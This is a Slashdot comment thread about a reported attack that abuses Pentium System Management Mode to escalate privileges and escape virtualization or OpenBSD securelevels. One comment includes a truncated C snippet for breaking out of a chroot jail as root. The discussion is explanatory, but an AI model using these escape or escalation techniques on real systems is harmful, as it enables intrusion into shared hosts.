# Note: all of these requests run in the caller process, without going through # the started process. ConCache.put(:my_cache, key, value) # inserts value or overwrites the old one ConCache.insert_new(:my_cache, key, value) # inserts value or returns {:error, :already_exists} ConCache.get(:my_cache, key) ConCache.delete(:my_cache, key) ConCache.size(:my_cache) ConCache.update(:my_cache, key, fn(old_value) -> # This function is isolated on a row level. Modifications such as update, put, delete, # on this key will wait for this function to finish. # Modifications on other items are not affected. # Reads are always dirty. {:ok, new_value} end) # Similar to update, but executes provided function only if item exists. # Otherwise returns {:error, :not_existing} ConCache.update_existing(:my_cache, key, fn(old_value) -> {:ok, new_value} end) # Returns existing value, or calls function and stores the result. # If many processes simultaneously invoke this function for the same key, the function will be # executed only once, with all others reading the value from cache. ConCache.get_or_store(:my_cache, key, fn() -> initial_value end) # Similar to get_or_store/3 but works with :ok/:error tuples. # The value is cached only if the function returns an :ok tuple. ConCache.fetch_or_store(:my_cache, key, fn -> case call_api() do # The processed value will be cached and returned as an :ok tuple. {:ok, data} -> {:ok, process_data(data)} # The error tuple is propagated to the caller. {:error, _reason} = error -> error end end)
Dirty modifiers operate directly on ETS record without trying to acquire the row lock:
ConCache.dirty_put(:my_cache, key, value) ConCache.dirty_insert_new(:my_cache, key, value) ConCache.dirty_delete(:my_cache, key) ConCache.dirty_update(:my_cache, key, fn(old_value) -> ... end) ConCache.dirty_update_existing(:my_cache, key, fn(old_value) -> ... end) ConCache.dirty_get_or_store(:my_cache, key, fn() -> ... end) ConCache.dirty_fetch_or_store(:my_cache, key, fn() -> ... end)
Callback
You can register your own function which will be invoked after an element is stored or deleted:
{ConCache, [name: :my_cache, callback: fn(data) -> ... end]} ConCache.put(:my_cache, key, value) # fun will be called with {:update, cache_pid, key, value} ConCache.delete(:my_cache, key) # fun will be called with {:delete, cache_pid, key}
The delete callback is invoked before the item is deleted, so you still have the chance to fetch the value from the cache and do something with it.
TTL
{ConCache, [ name: :my_cache, ttl_check_interval: :timer.seconds(1), global_ttl: :timer.seconds(5) ]}
This example sets up item expiry check every second, and sets the global expiry for all cache items to 5 seconds. Since ttl_check_interval is 1 second, the item lifetime might be at most 6 seconds.
However, the item lifetime is renewed on every modification. Reads don't extend global_ttl, but this can be changed when starting cache:
{ConCache, [ name: :my_cache, ttl_check_interval: :timer.seconds(1), global_ttl: :timer.seconds(5), touch_on_read: true ]}
In addition, you can manually renew item's ttl:
ConCache.touch(:my_cache, key)
And you can override ttl for each item:
ConCache.put(:my_cache, key, %ConCache.Item{value: value, ttl: ttl}) ConCache.update(:my_cache, key, fn(old_value) -> {:ok, %ConCache.Item{value: new_value, ttl: ttl}} end)
And you can update an item without resetting the item's ttl:
ConCache.put(:my_cache, key, %ConCache.Item{value: value, ttl: :no_update}) ConCache.update(:my_cache, key, fn(old_value) -> {:ok, %ConCache.Item{value: new_value, ttl: :no_update}} end)
If you use ttl value of
:infinity the item never expires.
TTL check is not based on brute force table scan, and should work reasonably fast assuming the check interval is not too small. I broadly recommend
ttl_check_interval to be at least 1 second, possibly more, depending on the cache size and desired ttl.
If needed, you may also pass false to
ttl_check_interval. This effectively stops
con_cache from checking the ttl of your items:
{ConCache, [ name: :my_cache, ttl_check_interval: false ]}
Supervision
A call to
ConCache.start_link (or
start) creates the so called cache owner process. This is the process that is the owner of the underlying ETS table and also the process where TTL checks are performed. No other operation (such as get or put) runs in this process.
As you've seen from the examples above, it's your responsibility to place the cache owner process into your own supervision tree. This gives you the control of cache cleanup when some subtree terminates (since a termination of the owner process will release the ETS table).
If for some reason
:con_cache application is terminated, all cache owner processes will be terminated as well, regardless of the fact that they do not reside in the
:con_cache supervision tree.
Multiple caches
Sometimes it can be useful to run multiple caches - say, if you need 2 caches with different global expiry values. Even though you can override ttl for each item individually, it might get tedious very quickly.
By default it's not possible to run multiple caches under the same supervisor because child specification of each cache owner process has
id equal to
ConCache.
However you can override default child specification and provide unique
id:
def start(_type, _args) do Supervisor.start_link( [ ... con_cache_child_spec(:my_cache_1, 100), con_cache_child_spec(:my_cache_2, 200) ... ], ... ) end defp con_cache_child_spec(name, global_ttl) do Supervisor.child_spec( { ConCache, [ name: name, ttl_check_interval: :timer.seconds(1), global_ttl: :timer.seconds(global_ttl) ] }, id: {ConCache, name} ) end
See Supervisor.child_spec/2 for details of this technique.
Process alias
Functions
ConCache.start and
ConCache.start_link return standard
{:ok, pid} result. You can interface with the cache using this pid. As mentioned, cache operations are not running through this process - the pid is just used to discover the corresponding ETS table.
Most of the time using pid to interface the cache is not appropriate. Just like in examples above, you usually want to give some alias to your cache, and then access it via this alias. In the examples above, we used
name: :some_alias to provide local alias. Alternatively, you can use following formats for
name option:
{:global, some_alias} # globally registered alias {:via, module, some_alias} # registered through some module (e.g. gproc)
In this case, you can just pass the same tuple to other
ConCache functions. For example, to use the cache with gproc, you can do something like this:
ConCache.start_link([], name: {:via, :gproc, :my_cache}) ... ConCache.put({:via, :gproc, :my_cache}, :some_key, :some_value)
Testing in your application
Keep in mind that
ConCache introduces a state to your system. Thus, when you're testing your application, some tests might accidentally compromise the execution of other tests. There are a couple of options to work around that:
- Use different keys in each test. This could help avoiding tests compromising each other.
- Before each test, force restart the
ConCacheprocess. This will ensure each test runs with the empty cache.
setup do Supervisor.terminate_child(con_cache_supervisor, ConCache) Supervisor.restart_child(con_cache_supervisor, ConCache) :ok end
Where
con_cache_supervisor is the supervisor from which the
ConCache process is started.
- Fetch all keys from the
etstable, and delete each entry:
setup do :my_cache |> ConCache.ets |> :ets.tab2list |> Enum.each(fn({key, _}) -> ConCache.delete(:my_cache, key) end) :ok end
Inner workings
ETS table
The ETS table is always public, and by default it is of set type. Some ETS parameters can be changed:
ConCache.start_link(ets_options: [ :named_table, {:name, :test_name}, :ordered_set, {:read_concurrency, true}, {:write_concurrency, true}, {:heir, heir_pid} ])
Additionally, you can override ConCache, and access ETS directly:
:ets.insert(ConCache.ets(cache), {key, value})
Of course, this completely overrides additional ConCache behavior, such as ttl, row locking and callbacks.
Bag and Duplicate Bag
Those types are now supported by ConCache but like ETS, some functions are not supported by those types. Here are the list of functions not supported by bag and duplicate bag type tables:
update/3
dirty_update/3
update_existing/3
dirty_update_existing/3
get_or_store/3
dirty_get_or_store/3
fetch_or_store/3
dirty_fetch_or_store/3
Locking
To provide isolation, custom implementation of mutex is developed. This enables that each update operation is executed in the caller process, without the need to send data to another sync process.
When a modification operation is called, the ConCache first acquires the lock and then performs the operation. The acquiring is done using the pool of lock processes that reside in the ConCache supervision tree. The pool contains as many processes as there are schedulers.
If the lock is not acquired in a predefined time (default = 5 seconds, alter with acquire_lock_timeout ConCache parameter) an exception will be generated.
You can use explicit isolation to perform isolated reads if needed. In addition, you can use your own lock ids to implement bigger granularity:
ConCache.isolated(cache, key, fn() -> ConCache.get(cache, key) # isolated read end) # Operation isolated on an arbitrary id. The id doesn't have to correspond to a cache item. ConCache.isolated(cache, my_lock_id, fn() -> ... end) # Same as above, but immediately returns {:error, :locked} if lock could not be acquired. ConCache.try_isolated(cache, my_lock_id, fn() -> ... end)
Keep in mind that these calls are isolated, but not transactional (atomic). Once something is modified, it is stored in ETS regardless of whether the remaining calls succeed or fail. The isolation operations can be arbitrarily nested, although I wouldn't recommend this approach.
TTL
When ttl is configured, the owner process works in discrete steps using
:erlang.send_after to trigger the next step.
When an item ttl is set, the owner process receives a message and stores it in its internal structure without doing anything else. Therefore, repeated touching of items is not very expensive.
In the next discrete step, the owner process first applies the pending ttl set requests to its internal state. Then it checks which items must expire at this step, purges them, and calls
:erlang.send_after to trigger the next step.
This approach allows the owner process to do fairly small amount of work in each discrete step.
Consequences
Due to the locking and ttl algorithms just described, some additional processing will occur in the owner processes. The work is fairly optimized, but I didn't invest too much time in it.
For example, lock processes currently use pure functional structures such as
HashDict and
:gb_trees. This could probably be replaced with internal ETS table to make it work faster, but I didn't try it.
Due to locking and ttl inner workings, multiple copies of each key exist in memory. Therefore, I recommend avoiding complex keys.
Status
ConCache has been used in production to manage several thousands of entries served to up to 4000 concurrent clients, on the load of up to 2000 reqs/sec. I don't maintain that project anymore, so I'm not aware of its current status.
|
https://elixir.libhunt.com/con_cache-alternatives
|
CC-MAIN-2021-43
|
refinedweb
| 2,069
| 58.69
|
AdaBoost Regression with Python
Want to share your content on python-bloggers? click here.
This post will share how to use the adaBoost algorithm for regression in Python. What boosting does is that it makes multiple models in a sequential manner. Each newer model tries to successful predict what older models struggled with. For regression, the average of the models are used for the predictions. It is often most common to use boosting with decision trees but this approach can be used with any machine learning algorithm that deals with supervised learning.
Boosting is associated with ensemble learning because several models are created that are averaged together. An assumption of boosting, is that combining weight loss of a patient based on several independent variables. The steps of this process are as follows.
- Data preparation
- Regression decision tree baseline model
- Hyperparameter tuning of Adaboost regression model
- AdaBoost regression model development
Below is some initial code
from sklearn.ensemble import AdaBo train_test_split from sklearn.model_selection import KFold from sklearn.metrics import mean_squared_error
Data Preparation
There is little data preparation for this example. All we need to do is load the data and create the X and y datasets. Below is the code.
df=data('cancer').dropna() X=df[['time','sex','ph.karno','pat.karno','status','meal.cal']] y=df['wt.loss']
We will now proceed to creating the baseline regression decision tree model.
Baseline Regression Tree Model
The purpose of the baseline model is for comparing it to the performance of our model that utilizes adaBoost. In order to make this model we need to Initiate a Kfold cross-validation. This will help in stabilizing the results. Next we will create a for loop so that we can create several trees that vary based on their depth. By depth, it is meant how far the tree can go to purify the classification. More depth often leads to a higher likelihood of overfitting.
Finally, we will then print the results for each tree. The criteria used for judgment is the mean squared error. Below is the code and results
for depth in range (1,10): tree_regressor=tree.DecisionTreeRegressor(max_depth=depth,random_state=1) if tree_regressor.fit(X,y).tree_.max_depth<depth: break score=np.mean(cross_val_score(tree_regressor,X,y,scoring='neg_mean_squared_error', cv=crossvalidation,n_jobs=1)) print(depth, score) 1 -193.55304528235052 2 -176.27520747356175 3 -209.2846723461564 4 -218.80238479654003 5 -222.4393459885871 6 -249.95330609042858 7 -286.76842138165705 8 -294.0290706405905 9 -287.39016236497804
Looks like a tree with a depth of 2 had the lowest amount of error. We can now move to tuning the hyperparameters for the adaBoost algorithm.
Hyperparameter Tuning
For hyperparameter tuning we need to start by initiating our AdaBoostRegresor() class. Then we need to create our grid. The grid will address two hyperparameters which are the number of estimators and the learning rate. The number of estimators tells Python how many models to make and the learning indicates how each tree contributes to the overall results. There is one more parameters which is random_state but this is just for setting the seed and never changes.
After making the grid, we need to use the GridSearchCV function to finish this process. Inside this function you have to set the estimator which is adaBoostRegressor, the parameter grid which we just made, the cross validation which we made when we created the baseline model, and the n_jobs which allocates resources for the calculation. Below is the code.
ada=AdaBoostRegressor() search_grid={'n_estimators':[500,1000,2000],'learning_rate':[.001,0.01,.1],'random_state':[1]} search=GridSearchCV(estimator=ada,param_grid=search_grid,scoring='neg_mean_squared_error',n_jobs=1,cv=crossvalidation)
Next, we can run the model with the desired grid in place. Below is the code for fitting the mode as well as the best parameters and the score to expect when using the best parameters.
search.fit(X,y) search.best_params_ Out[31]: {'learning_rate': 0.01, 'n_estimators': 500, 'random_state': 1} search.best_score_ Out[32]: -164.93176650920856
The best mix of hyperparameters is a learning rate of 0.01 and 500 estimators. This mix led to a mean error score of 164, which is a little lower than our single decision tree of 176. We will see how this works when we run our model with the refined hyperparameters.
AdaBoost Regression Model
Below is our model but this time with the refined hyperparameters.
ada2=AdaBoostRegressor(n_estimators=500,learning_rate=0.001,random_state=1) score=np.mean(cross_val_score(ada2,X,y,scoring='neg_mean_squared_error',cv=crossvalidation,n_jobs=1)) score Out[36]: -174.52604137201791
You can see the score is not as good but it is within reason.
Conclusion
In this post, we explored how to use the AdaBoost algorithm for regression. Employing this algorithm can help to strengthen a model in many ways at times.
Want to share your content on python-bloggers? click here.
|
https://python-bloggers.com/2019/01/adaboost-regression-with-python/
|
CC-MAIN-2021-10
|
refinedweb
| 804
| 51.44
|
This little.
Take a look at those earlier articles if you're interested in the background basics.
Libraries
We need two Python drivers for this project — one for the 128x64 OLED display, and one for the gyroscope.
The display in this example uses the ssd1306 chip, so we can use the module available in the MicroPython repository.
The gyroscope is a MPU6050, a Python library for which is available from @adamjezek98 here on Github.
Download both files and upload them to your controller using ampy or the web REPL.
Once the libraries are in place, connect to your controller and try and import both packages. If the imports work, you should be good to go.
import ssd1306 import mpu6050
Wiring
Both the ssd1306 display and the MPU6050 gyroscope-accelerometer communicte via I2C. Helpfully they're also on different channels, so we don't need to do any funny stuff to talk to them both at the same time.
The wiring is therefore quite simple, hooking them both up to
+5V/
GND and connecting their
SCL and
SDA pins to
D1 and
D2 respectively.
On the boards I have the the
SDA,
SCL,
GND and
5V pins are in reverse order when the boards are placed pins-top. Double check what you're wiring where.
Code
The project is made up of 3 parts —
- the gyroscope code to calibrate, retrieve and smooth the data
- the 3D point code to handle the positions of cube in space
- the simulation code to handle the inputs, and apply them to the 3D scene, outputting the result
First, the basic imports for I2C and the two libraries used for the display and gyro.
from machine import I2C, Pin import ssd1306 import mpu6050 import math i2c = I2C(scl=Pin(5), sda=Pin(4)) display = ssd1306.SSD1306_I2C(128, 64, i2c) accel = mpu6050.accel(i2c)
Gyroscope
The gyroscope values can be a little noisy, and because of manufacturing variation (and gravity) need calibrating at rest before use.
Some standard smoothing and calibration code is shown below — to see a more thorough explanation of this see the introduction to 3-axis gyro-accelerometers in MicroPython.
First the smoothed sampling code which takes a number of samples and returns the mean average. It accepts a calibration input which provides a base value to remove from the resulting measurement.
def get_accel(samples=10, calibration=None): # Setup a dict of measure at 0 result = {} for _ in range(samples): v = accel.get_values() for m in v.keys(): # Add on value / samples (to generate an average) result[m] = result.get(m, 0) + v[m] / samples if calibration: # Remove calibration adjustment for m in calibration.keys(): result[m] -= calibration[m] return result
The calibration code takes a number of samples, waiting for the variation to drop below threshold. It then returns this base offset for use in future calls to
get_accel.
def calibrate(threshold=50): print('Calibrating...', end='') while True: v1 = get_accel(100) v2 = get_accel(100) if all(abs(v1[m] - v2[m]) < threshold for m in v1.keys()): print('Done.') return v1
Point3.
The code here is based on this example for Pygame. The initial conversion of that code to MicroPython with an OLED screen and some background on the theory can be found here.
class Point3D: def __init__(self, x = 0, y = 0, z = 0): self.x, self.y, self.z = x, y, z def rotateX(self, deg): """ Rotates this point around the X axis the given number of degrees. """ rad = deg * math.pi / 180 cosa = math.cos(rad) sina = math.sin(rad) y = self.y * cosa - self.z * sina z = self.y * sina + self.z * cosa return Point3D(self.x, y, z) def rotateY(self, deg): """ Rotates this point around the Y axis the given number of degrees. """ rad = deg * math.pi / 180 cosa = math.cos(rad) sina = math.sin(rad) z = self.z * cosa - self.x * sina x = self.z * sina + self.x * cosa return Point3D(x, self.y, z) def rotateZ(self, deg): """ Rotates this point around the Z axis the given number of degrees. """ rad = deg *)
Gyro-locked Perspective Simulation
The first demo uses the accelerometer to produce a simulated perspective view of the cube. Tilting the board allows us to see "around" the edges of the cube, as if we were looking into the scene through a window.
To detect the angle of the device we're using the accelerometer. You might think to use the gyroscope first — I did — but remember the gyroscope detects angular velocity, not angle. Measurements are zero at rest, in any orientation. You can track the velocity changes and calculate the angle from this yourself, but gradually the error will build up and the cube will end up pointing the wrong way.
Using the accelerometer we have a defined rest point (flat on the surface) from which to calculate the current rotation. Placing the device flat will always return to the initial state.
class Simulation: def __init__(self, width=128, height=64, fov=64, distance] def run(self): # Starting angle (unrotated in any dimension) angleX, angleY, angleZ = 0, 0, 0 calibration = calibrate() while 1: data = get_accel(10, calibration) angleX = data['AcX'] / 256 angleY = data['AcY'] / 256()
We use a simple helper function to convert lists of
float into lists of
int to make updating the OLED display simpler.
def to_int(*args): return [int(v) for v in args]
We can create a
Simulation and run it with the following.
s = Simulation() s.run()
Leave it on a flat surface as you start it up, so the calibration can complete quickly.
Once running it should look something like the following. If you pick up the device and tilt it you should notice the perspective of the cube change, as if you were 'looking around' the side of a real 3D cube.
Making it Spin
So far we've only used the accelerometer, and the cube has remained locked in a single position. This second demo uses the gyroscope to detect angular velocity allowing you to make the cube spin by flicking the device in one direction or another.
We do this by reading the velocity and adding it along a given axis. By reducing the velocity gradually over time, we can add a sense of friction to the rotation. The result is a cube that you can flick to rotate, that will gradually come to a rest.
The idea is to mimick the effect of a cube (e.g. a dice) floating inside a ball of liquid. Rotating it quickly adds momentum, which is gradually reduced by friction.
The simulation code is given below.
class Simulation: def __init__( self, width=128, height=64, fov=64, distance=4, inertia=10, acceleration=25, friction=1 ):] # Configuration self.friction = friction self.acceleration = acceleration self.inertia = inertia def run(self): velocityX, velocityY, velocityZ = 0, 0, 0 calibration = calibrate() while 1: t = [] # Get current rotational velocity from sensor. data = get_accel(10, calibration) gyroX = -data['GyY'] / 1024 gyroY = data['GyX'] / 1024 gyroZ = -data['GyZ'] / 1024 # Apply velocity, with slide for friction. if abs(gyroX) > self.inertia: velocityX = slide_to_value(velocityX, gyroX, self.acceleration) if abs(gyroY) > self.inertia: velocityY = slide_to_value(velocityY, gyroY, self.acceleration) if abs(gyroZ) > self.inertia: velocityZ = slide_to_value(velocityZ, gyroZ, self.acceleration) rotated = [] for v in self.vertices: r = v.rotateX(velocityX).rotateY(velocityY).rotateZ(velocityZ) p = r.project(*self.projection) t.append(p) rotated.append(r) self.vertices = rotated display.fill(0) for e in self.edges: display.line(*to_int(t[e[0]].x, t[e[0]].y, t[e[1]].x, t[e[1]].y, 1)) display.show() velocityX = slide_to_value(velocityX, 0, self.friction) velocityY = slide_to_value(velocityY, 0, self.friction) velocityZ = slide_to_value(velocityZ, 0, self.friction)
We need another helper function which handles the gradual "slide" of a given
value towards it's
target. This is used to both smooth acceleration and to gradually bleed off velocity via friction. The maximum value of change is specified by
slide.
def slide_to_value(value, target, slide): """ Move value towards target, with a maximum increase of slide. """ difference = target-value if not difference: return value sign = abs(difference) / difference # -1 if negative, 1 if positive return target if abs(difference) < slide else value + slide * sign
The simulation works as follows —
- Read the rotational velocity from the gyroscope for each axis (X and Z axes are reversed because of the orientation of the sensor).
- If the measured velocity in a given axis is higher than
inertiawe add move the current
velocitytowards the measured value, in steps of
accelerationmax.
- The current velocities are used to update the vertices rotating them in 3D space, and storing the resulting updated positions. This is neccessary to ensure that the orientation of the axes for the view remain aligned with the frame of the gyroscope.
- The display is drawn as before.
- Finally we move all values towards zero by sliding towards zero, in steps of
friction.
The end result is a 3D cube which responds to user input through the gyroscope, rotating along the appropriate axis. The
inertia means small movements are ignored, so you can flick it in a given direction and then return it slowly to the original place and it will continue to spin.
You can experiment with the
inertia,
acceleration and
friction values to see what effect they have. There is no real physics at work here, so you can create some quite weird behaviours.
|
https://www.twobitarcade.net/article/gyroscopic-wireframe-cube/
|
CC-MAIN-2019-09
|
refinedweb
| 1,564
| 58.18
|
Package for easier access to FocusVision's Decipher REST API
Project description
This packages permits easier access to FocusVision’s Decipher tools REST API.
If you are a Decipher user, you can use the API to read and write your survey data, provision users, create surveys and many other tasks.
If you are not a FocusVision client, visit to learn more about our services.
Documentation
For an introduction to using the API, see this Knowledge Base article:
For current API reference documentation, see.
Quick Examples
Install the package:
sudo pip install decipher
You have three options to authenticate against the API:
Using an API Key: visit the Research Hub, and from the User Links menu (click on your picture in the upper right corner), select API Keys. Here you can provision a new API key for yourself or another user created just for API usage.
API keys last until revoked or rekeyed. This is the preferrable method if you are using the API for automation.
If you only expect to use the API from the command line, you do not have to create an API key but can login to the system just as if you had logged into the user interface (thus it will expire after anywhere between 15 minutes to 24 hours depending on your company’s security settings). Here’s an example session:
$ beacon login If you are using the Beacon) 3. Enter a long code (visible on the API key page) q. Quit Select 1, 2, 3 or q: x
If you select option 1:
Enter your API key See API KEY: **p84443bmg06skt6ceawpq4xa9qxyx8jucuxk0fz5mxuwp1v4** Enter your host, or press Enter for the default selfserve.decipherinc.com Host: **yourprivatehost.decipherinc.com** Testing your new settings... Looks good. Settings were saved to the file /home/youruser/.config/decipher
If you select option 2:
Enter your full username (email address) Username: ***you@company.com*** Enter your password Password: **password, not shown** Enter your host, or press Enter for the default selfserve.decipherinc.com Host: **yourprivatehost.decipherinc.com** Testing your new settings... Acquired a temporary session key. It will be expire after 1439 minutes of idle time. Looks good. Settings were saved to the file /home/youruser/.config/decipher
If you select option 3:
Visit (or private server equivalent) Select 'generate temporary key' then paste it below Temporary Key: **NDJiZD.....** Testing your new settings... Looks good. Settings were saved to the file /home/youruser/.config/decipher
The “login” action saves your API information in the file ~/.config/decipher.
From the command line you can now run the “beacon” script which lets you quickly run an API call:
beacon -t get rh/users select=id,email,fullname,last_login_from sort=-last_login_when limit=10
- The above illustrates:
- An API call with method GET
- Targetting the “users” resource, which will be at /api/v1/rh/users
- Using the “projection” feature to select only 4 fields (id, email, full name and IP of last login)
- Using the “sorting” feature to order the response by descending time of last login
- Using the “pagination” feature to limit output to 10 first entries
- Using the -t option to output the data as a formattet text table, rather than JSON.
If you replace the -t option with -p you will see the Python code needed for that same call:
from decipher.beacon import api users = api.get("rh/users", select="id,email,fullname,last_login_from", sort="-last_login_when", limit=10) for user in users: print "User #{id} <{email}> logged in last from {last_login_from}".format(user)
Authentication
You need an API key to use the API if you are not using a temporary, time limited login. You can supply this key in 3 ways when connecting remotely:
By specifying it in the ~/.config/decipher file which has this format:
[main] key=p84443bmg06skt6ceawpq4xa9qxyx8jucuxk0fz5mxuwp1v4 host=selfserve.decipherinc.com
The “main” section is default, but you can select any other by using beacon -sothersection or setting api.section = “section” before calling any API functions.
By setting an environment variable:
export BEACON_KEY=1234567890abcdef1234567890abcdef export BEACON_HOST=selfserve.decipherinc.com
Be aware that environment variables on most UNIX systems are visible to other programs running on the same machine.
By explicitly initializing the API with login information:
from decipher.beacon import api api.login("1234567890abcdef1234567890abcdef", "selfserve.decipherinc.com")
API Versioning
Current API uses version 1. This package will only ever do version 1 calls. To opt-in to a newer version of the API, run (prior to doing any calls):
from decipher.beacon import api api.version = 2
We do not expect to increase the API to version 2 any time soon unless new functionality cannot be added without using parameters with default values.
Command line options
The command line script has the following options: [ or are null Options: -v verbose (show headers sent & received)) -t display output as an aligned text table -x display output as IBM JSON XML -p display Python code required to make the call -s <section> use a different section in the /home/youruser/.config/decipher file than 'main' -V <version> use a different API version
For example, to create a new API key for user bob@company.com, restricted only to the 8.8.8.8 IP address run:
beacon post rh/apikeys user=bob@company.com 'restrictions={"networks":["8.8.8.8"]}'
NOTE: Because of the way the shell manages quoting, you should surround parameters which are to be sent as objects with single quotes.
Data can be read from files rather than supplied on the command line. Use param=@filename to read the entire contents of the file “filename”. You can convert a tab-delimited file to a an array of JSON object using the syntax: @filename@json. For example, if “data.txt” contains some data you want to upload into a survey, you can do:
beacon post surveys/your-survey/data/edit key=source data=@data.txt@json
Which will send along the contents of the tab-delimited data.txt but convert it into an array of JSON objects first.
Similarly, using @filename.yml@yaml will parse the file as YAML.
Using @filename@64 will encode the file as base-64. This is useful for APIs like syslang/{language} which accept a base-64 encoded Excel file as input.
Meta-API
APIs like the distribute/email let you take output of one API call and feed it into another API. Using distribute/email you can e.g. generate one or more data files and feed the result into distribute/email which will send the results via email as an attachment.
The beacon script provides a shortcut to compose this from the command line, using the -m option. Calling beacon -m will, rather than performing the call, output the target and arguments in the object form consumed by meta-APIs like distribute/email.
Example composition with shell script:
DATAMAP=$(beacon -m get surveys/demo/report/tables/datamap format=html) beacon post distribute/email sources=${DATAMAP}, recipients=joe@example.com, subject="Your daily datamap"
Here, the beacon -m option is used to put the string:
{"api": "/api/v1/surveys/demo/report/tables/datamap", "method": "GET", "args": {"format": "html"}}
into the $DATAMAP shell variable, which is then passed into a call to distribute/email.
Note there are some convenience features to create arrays used above: if a SIMPLE command line argument contains or ends with a comma, then it’s assumed to be a comma-separated list of strings. This works for something like “3,4,5” or “user@decipherinc.com,”.
If it starts with {} (like the content of the DATAMAP variable) and ends with a comma it’s also wrapped in an array. Here we only look for comma at the end of the argument – if we looked anywhere, splitting would likely destroy the JSON object.
The corresponding Python code would be:
from decipher.beacon import api datamap = api.get('surveys/demo/report/tables/datamap', format='html', meta=True) print api.post('distribute/email', sources=[datamap], recipients=["joe@example.com"], subject="Your daily datamap")
Note the meta=True argument to the normal api.get call, which will not perform the call but return the meta-dictionary.
Using on a Beacon installation
You can use this script when logged into a Beacon instance, in which case authentication happens locally and automatically. While in a survey directory, use “beacon ./datamap format=html” – the ./ will be replaced with surveys/your/survey/path/ automatically.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/decipher/
|
CC-MAIN-2021-49
|
refinedweb
| 1,427
| 55.95
|
Pentium Computers Vulnerable to Attack? 227
Posted by ScuttleMonkey
from the sounds-like-more-work-than-it's-worth dept.
from the sounds-like-more-work-than-it's-worth dept.
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
the sky is falling (Score:5, Funny)
Re:the sky is falling (Score:2)
It's a frustrating article (Score:4, Interesting)
The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report [monkey.org] correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog [berylliumsphere.com]
Aren't you already screwed? (Score:5, Interesting)
Re:Aren't you already screwed? (Score:3, Informative)
Re:Aren't you already screwed? (Score:5, Funny)
Re:Aren't you already screwed? (Score:3, Insightful)
1. They don't NEED to do any of it because they already own your box
2. The system designers really fucked the pooch good on the security design of these components
Come on even Windows knows that not just any Joe User should be able to reprogam the CPU interrupts...
Re:Aren't you already screwed? (Score:2, Insightful)
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:2)
if you've got p4's installed in the machine, there's no need to fake anything, it's already in the package.
aside from joking, badly written software that puts way too much pressure on the cpu, can overheat a badly ventilated machine. in some countries you just have to syncrhonize your attack with the weather conditions (over here it pops over 40C in the summer, a bit load on the machine and it will overheat by itself, no torch needed).
and eventually there's no ultima
Re:Aren't you already screwed? (Score:2)
Re:Aren't you already screwed? (Score:3, Informative)
Think like an evil hax0r, then be afraid. (Score:5, Interesting)
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Re:Think like an evil hax0r, then be afraid. (Score:2)
chroot is *not* secure if attacker has root (Score:2)
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <unistd.h>
void main(int argc, char **argv)
{
int i;
if ( argc < 3 ){
fprintf(stderr,"Bad argument count\n");
exit(1);
}
if(chroot(argv[1])){
Re:Think like an evil hax0r, then be afraid. (Score:3, Insightful)
So does anything that can load before your kernel. (Like a boot sector virus.)
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
This isn't really different than a boot sector. If you have root on a VIRTUAL server, you shouldn't have access to this or to the
Re:Think like an evil hax0r, then be afraid. (Score:3, Informative)
> the "real" OS)?
If it is a P-IV in a 1U rack I'd suspect all you would have to do would be chew CPU cycles like mad for a hour. It isn't that hard, most of the first batch of P-IV chips ran so hot they will only run at their rated speed for a few minutes without some serious aftermarket cooling solutions. So there are potentially a couple million machines out there which are especially vulnerable.
Re:Aren't you already screwed? (Score:2)
What about MMUs (Score:2, Informative)
Physical access (Score:4, Insightful)
Move along, folks.
Re:Physical access (Score:2)
"Physical access" is one of the reasons why wireless will never - well, not anytime soon, anyway - be fully secure.
Re:Physical access (Score:2)
Would you elaborate on that? I'm trying to understand the link between "Physical access" and "wireless".
I'm hoping that setting up an OpenBSD machine (sparc64) to be an AP where only authorized people who log into it through ssh are allowed access through it with authpf and then only IPSEC traffic, might be able to provide decent security.
Technically, you are correct. (Score:3, Interesting)
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has sy
Re:Technically, you are correct. (Score:2)
Re:Physical access (Score:2)
The twist the virus can set the overheat temp very low, so its easy to trigger via the virus,
and the virus also does something akin to a bios flash that uploads a custom bios
instead of just nuking the bios like cmos death did
Its kinda like the firmware vulnerabilities that were present in some cheap routers
and in cisco's case not so cheap
it can be done remotely
Ex-M
Sensational headline about a poor article. (Score:5, Informative)
Re:Sensational headline about a poor article. (Score:5, Interesting)
